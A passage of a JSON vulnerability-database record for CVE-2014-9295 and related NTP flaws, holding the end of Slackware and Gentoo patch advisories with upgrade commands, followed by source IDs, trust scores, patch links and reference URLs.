ntp-4.2.8-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nf2b45a45c846a909ae201176ce359939  ntp-4.2.8-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n12d7ab6e2541af4d1282621d3773e7f7  ntp-4.2.8-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n5b2150cee9840d8bb547098cccde879a  n/ntp-4.2.8-i486-1.txz\n\nSlackware x86_64 -current package:\n9ce09c5d6a60d3e2117988e4551e4af1  n/ntp-4.2.8-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. \n\nReferences:\n\nCVE-2014-9293\nCVE-2014-9294\nCVE-2014-9295\nCVE-2014-9296\nCVE-2013-5211\nSSRT102239\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  Platform\n   Patch Kit Name\n\n  Alpha IA64 V8.4\n   75-117-380_2015-08-24.BCK\n\n  NOTE: Please contact OpenVMS Technical Support to request these patch kits. The net-misc/ntp package contains the official reference\nimplementation by the NTP Project. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  net-misc/ntp                 \u003c 4.2.8                    \u003e= 4.2.8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-9293\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9293\n[ 2 ] CVE-2014-9294\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9294\n[ 3 ] CVE-2014-9295\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9295\n[ 4 ] CVE-2014-9296\n      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9296\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-34.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-9295"
      },
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      },
      {
        "db": "BID",
        "id": "71761"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9295"
      },
      {
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "134756"
      },
      {
        "db": "PACKETSTORM",
        "id": "130140"
      },
      {
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "db": "PACKETSTORM",
        "id": "129693"
      },
      {
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "db": "PACKETSTORM",
        "id": "129683"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      }
    ],
    "trust": 3.51
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#852879",
        "trust": 3.2
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9295",
        "trust": 3.1
      },
      {
        "db": "BID",
        "id": "71761",
        "trust": 1.4
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-353-01",
        "trust": 1.2
      },
      {
        "db": "SECUNIA",
        "id": "62209",
        "trust": 1.1
      },
      {
        "db": "MCAFEE",
        "id": "SB10103",
        "trust": 1.1
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-353-01C",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU96605606",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007352",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-14-353-01A",
        "trust": 0.3
      },
      {
        "db": "JUNIPER",
        "id": "JSA10663",
        "trust": 0.3
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9295",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129716",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129793",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134756",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130140",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130481",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129693",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "133517",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129683",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129723",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9295"
      },
      {
        "db": "BID",
        "id": "71761"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      },
      {
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "134756"
      },
      {
        "db": "PACKETSTORM",
        "id": "130140"
      },
      {
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "db": "PACKETSTORM",
        "id": "129693"
      },
      {
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "db": "PACKETSTORM",
        "id": "129683"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9295"
      }
    ]
  },
  "id": "VAR-201412-0613",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.38256410625
  },
  "last_update_date": "2024-07-23T21:56:37.541000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ntp-4.2.2p1-18.0.1.AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=4191\u0026stype=\u0026sproduct=\u0026published=1"
      },
      {
        "title": "ntp-4.2.6p5-2.0.2.AXS4",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=4190\u0026stype=\u0026sproduct=\u0026published=1"
      },
      {
        "title": "cisco-sa-20141222-ntpd",
        "trust": 0.8,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd"
      },
      {
        "title": "HPSBGN03277 SSRT101957",
        "trust": 0.8,
        "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04582466"
      },
      {
        "title": "HPSBPV03266 SSRT101878",
        "trust": 0.8,
        "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04574882"
      },
      {
        "title": "NV15-009",
        "trust": 0.8,
        "url": "http://jpn.nec.com/security-info/secinfo/nv15-009.html"
      },
      {
        "title": "Bug 2667",
        "trust": 0.8,
        "url": "http://bugs.ntp.org/show_bug.cgi?id=2667"
      },
      {
        "title": "Bug 2668",
        "trust": 0.8,
        "url": "http://bugs.ntp.org/show_bug.cgi?id=2668"
      },
      {
        "title": "Bug 2669",
        "trust": 0.8,
        "url": "http://bugs.ntp.org/show_bug.cgi?id=2669"
      },
      {
        "title": "All diffs for ChangeSet 1.3246",
        "trust": 0.8,
        "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acc4dn1tbm1trjrbpca4yc1atda"
      },
      {
        "title": "All diffs for ChangeSet 1.3247",
        "trust": 0.8,
        "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acdf3tusfizxcv_x4b77jt_y-cg"
      },
      {
        "title": "All diffs for ChangeSet 1.3248",
        "trust": 0.8,
        "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acf55dxkfhb6muyqwzu8edls97g"
      },
      {
        "title": "SecurityNotice",
        "trust": 0.8,
        "url": "http://support.ntp.org/bin/view/main/securitynotice"
      },
      {
        "title": "Bug 1176037",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176037"
      },
      {
        "title": "RHSA-2014:2025",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-2025.html"
      },
      {
        "title": "RHSA-2015:0104",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2015-0104.html"
      },
      {
        "title": "Multiple vulnerabilities in NTP",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_ntp"
      },
      {
        "title": "\u300cNetwork Time Protocol daemon (ntpd) \u306b\u8907\u6570\u306e\u8106\u5f31\u6027\u300d\u306eSEIL\u30b7\u30ea\u30fc\u30ba\u3078\u306e\u5f71\u97ff\u306b\u3064\u3044\u3066",
        "trust": 0.8,
        "url": "http://www.seil.jp/support/security/a01515.html"
      },
      {
        "title": "\u30b5\u30fc\u30d0\u30fb\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u88fd\u54c1 Network Time Protocol daemon (ntpd)\u306e\u8106\u5f31\u6027(CVE-2014-9293\u301c9296)\u306b\u3088\u308b\u5f71\u97ff\u306b\u3064\u3044\u3066",
        "trust": 0.8,
        "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/ntpd_cve-2014-9293.html"
      },
      {
        "title": "cisco-sa-20141222-ntpd",
        "trust": 0.8,
        "url": "http://www.cisco.com/cisco/web/support/jp/112/1127/1127934_cisco-sa-20141222-ntpd-j.html"
      },
      {
        "title": "Red Hat: Important: ntp security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20142025 - security advisory"
      },
      {
        "title": "Red Hat: Important: ntp security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150104 - security advisory"
      },
      {
        "title": "Red Hat: Important: ntp security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20142024 - security advisory"
      },
      {
        "title": "Debian CVElist Bug Report Logs: ntp: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=1bb105aaeb75e38cf89e5f63d6e49db9"
      },
      {
        "title": "Red Hat: CVE-2014-9295",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-9295"
      },
      {
        "title": "Ubuntu Security Notice: ntp vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2449-1"
      },
      {
        "title": "Debian Security Advisories: DSA-3108-1 ntp -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d5c63d464b27e49c6a53057fab75a16d"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2014-462",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-462"
      },
      {
        "title": "Tenable Security Advisories: [R3] Tenable Appliance Affected by NTP Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-01"
      },
      {
        "title": "Citrix Security Bulletins: Citrix Security Advisory for NTP Vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=e9432b762bf2c2945bfb43af8d6842d5"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
      },
      {
        "title": "osx-10.7-ntp",
        "trust": 0.1,
        "url": "https://github.com/opragel/osx-10.7-ntp "
      },
      {
        "title": "ntp",
        "trust": 0.1,
        "url": "https://github.com/sous-chefs/ntp "
      },
      {
        "title": "ntp",
        "trust": 0.1,
        "url": "https://github.com/chef-cookbooks/ntp "
      },
      {
        "title": "LinuxFlaw",
        "trust": 0.1,
        "url": "https://github.com/mudongliang/linuxflaw "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-9295"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9295"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.kb.cert.org/vuls/id/852879"
      },
      {
        "trust": 2.2,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd"
      },
      {
        "trust": 2.0,
        "url": "http://support.ntp.org/bin/view/main/securitynotice"
      },
      {
        "trust": 2.0,
        "url": "http://advisories.mageia.org/mgasa-2014-0541.html"
      },
      {
        "trust": 1.6,
        "url": "http://lists.ntp.org/pipermail/announce/2014-december/000122.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-2025.html"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-0104.html"
      },
      {
        "trust": 1.1,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/en-us/ht6601"
      },
      {
        "trust": 1.1,
        "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acf55dxkfhb6muyqwzu8edls97g"
      },
      {
        "trust": 1.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176037"
      },
      {
        "trust": 1.1,
        "url": "http://bugs.ntp.org/show_bug.cgi?id=2668"
      },
      {
        "trust": 1.1,
        "url": "http://bugs.ntp.org/show_bug.cgi?id=2667"
      },
      {
        "trust": 1.1,
        "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acdf3tusfizxcv_x4b77jt_y-cg"
      },
      {
        "trust": 1.1,
        "url": "http://bugs.ntp.org/show_bug.cgi?id=2669"
      },
      {
        "trust": 1.1,
        "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acc4dn1tbm1trjrbpca4yc1atda"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142469153211996\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142590659431171\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:003"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=144182594518755\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142853370924302\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/71761"
      },
      {
        "trust": 1.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04916783"
      },
      {
        "trust": 1.1,
        "url": "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-417665.htm"
      },
      {
        "trust": 1.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04790232"
      },
      {
        "trust": 1.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10103"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/62209"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00020.html"
      },
      {
        "trust": 1.1,
        "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes"
      },
      {
        "trust": 1.1,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1047-security-advisory-8"
      },
      {
        "trust": 1.0,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9295"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9294"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9295"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9293"
      },
      {
        "trust": 0.8,
        "url": "http://support.ntp.org/bin/view/support/accessrestrictions#section_6.5.2"
      },
      {
        "trust": 0.8,
        "url": "http://www.ntp.org/downloads.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.ntp.org/ntpfaq/ntp-s-algo-crypt.htm"
      },
      {
        "trust": 0.8,
        "url": "http://googleprojectzero.blogspot.com/2015/01/finding-and-exploiting-ntpd.html"
      },
      {
        "trust": 0.8,
        "url": "https://support.f5.com/kb/en-us/solutions/public/15000/900/sol15936.html"
      },
      {
        "trust": 0.8,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15:07.ntp.asc"
      },
      {
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-2024.html"
      },
      {
        "trust": 0.8,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01c"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu96605606/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9295"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9296"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2014-9295"
      },
      {
        "trust": 0.3,
        "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_ntp"
      },
      {
        "trust": 0.3,
        "url": "http://www.ntp.org/"
      },
      {
        "trust": 0.3,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10663\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-408044.htm"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574882"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/101006439"
      },
      {
        "trust": 0.3,
        "url": "http://support.citrix.com/article/ctx200355"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/jan/att-97/esa-2015-004.txt"
      },
      {
        "trust": 0.3,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:31.ntp.asc"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04582466"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04916783"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/sep/41"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04554677"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966675"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967791"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696755"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01a"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory2.asc"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/101006440"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022036"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg1ssrvpoaix71security150210-1549"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097113"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022073"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698473"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696812"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020645"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097490"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005067"
      },
      {
        "trust": 0.3,
        "url": "http://www.hitachi.co.jp/products/it/server/security/global/info/vulnerable/ntpd_cve-2014-9293.html"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9294"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9296"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9293"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-9294"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2014-9293"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.2,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2014:2025"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/opragel/osx-10.7-ntp"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01-supplementa"
      },
      {
        "trust": 0.1,
        "url": "https://www.freebsd.org/handbook/makeworld.html\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-14:31.ntp.asc\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-14:31/ntp.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-14:31/ntp.patch"
      },
      {
        "trust": 0.1,
        "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9294\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9296\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://www.kb.cert.org/vuls/id/852879\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9293\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9295\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/support/security/"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/support/security/advisories/"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-9296"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "https://h20392.www2.hp.com/portal/sw"
      },
      {
        "trust": 0.1,
        "url": "https://www.hp.com/go/swa"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9297"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5211"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9294"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9296"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9295"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/glsa/glsa-201412-34.xml"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9293"
      },
      {
        "trust": 0.1,
        "url": "http://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#852879"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-9295"
      },
      {
        "db": "BID",
        "id": "71761"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-007352"
      },
      {
        "db": "PACKETSTORM",
        "id": "129716"
      },
      {
        "db": "PACKETSTORM",
        "id": "129793"
      },
      {
        "db": "PACKETSTORM",
        "id": "134756"
      },
      {
        "db": "PACKETSTORM",
        "id": "130140"
      },
      {
        "db": "PACKETSTORM",
        "id": "130481"
      },
      {
        "db": "PACKETSTORM",
        "id": "129693"
      },
      {
        "db": "PACKETSTORM",
        "id": "133517"
      },
      {
        "db": "PACKETSTORM",
        "id": "129683"
      },
      {
        "db": "PACKETSTORM",
        "id": "129723"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-9295"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
